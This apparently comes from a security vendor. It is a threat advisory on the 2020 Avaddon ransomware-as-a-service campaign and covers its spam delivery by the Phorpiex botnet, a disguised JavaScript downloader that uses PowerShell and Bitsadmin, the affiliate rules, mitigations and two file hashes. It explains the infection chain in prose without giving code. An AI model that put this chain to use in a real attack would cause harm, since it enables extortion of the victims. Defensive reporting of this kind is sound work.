On June 8, 2020, a new ransomware variant, dubbed “Avaddon,” was observed deploying a massive spam campaign which targeted users globally. The Phorpiex botnet has been identified distributing it via malicious emails that contain a JavaScript file that masquerades as a JPG image. Upon execution, the JavaScript attachment will launch a PowerShell and Bitsadmin command to download the Avaddon ransomware to the %Temp% folder. From there, the ransomware will start encrypting the victim’s computer and append the files with the “.avdn” extension. Once the encryption is done, Avaddon displays a ransom note that will direct a victim to a TOR payment site that contains instructions on how to pay for a decryptor.

According to an advertisement observed on an undisclosed Russian forum, the Avaddon operators claimed that they are a new Ransomware-as-a-Service (RaaS) program. Affiliates who join the program can distribute the ransomware through spam, compromised networks, and exploit kits; however, the affiliates must abide by a set of rules such as they cannot target victims in the Commonwealth of Independent States (CIS), including the Armenia, Azerbaijan, Belarus, Georgia, Kazakhstan, Kyrgyzstan, Moldova, Russia, Tajikistan, Turkmenistan, Ukraine, and Uzbekistan. At the time of writing, it is unclear what the overall impact is of the Avaddon ransomware campaign.

It is recommended that users have a reliable and tested backup that can be restored, implement an anti-spam solution to stop phishing emails from reaching the network, and keep the operating systems up-to-date. The following indicators of compromise have been identified with Avaddon Ransomware:

Hashes:

94faa76502bb4342ed7cc3207b3158027807a01575436e2b683d4816842ed65d

05af0cf40590aef24b28fa04c6b4998b7ab3b7f26e60c507adb84f3d837778f2

 

Ready to get started?

Contact us to discuss your security needs.

Let's Talk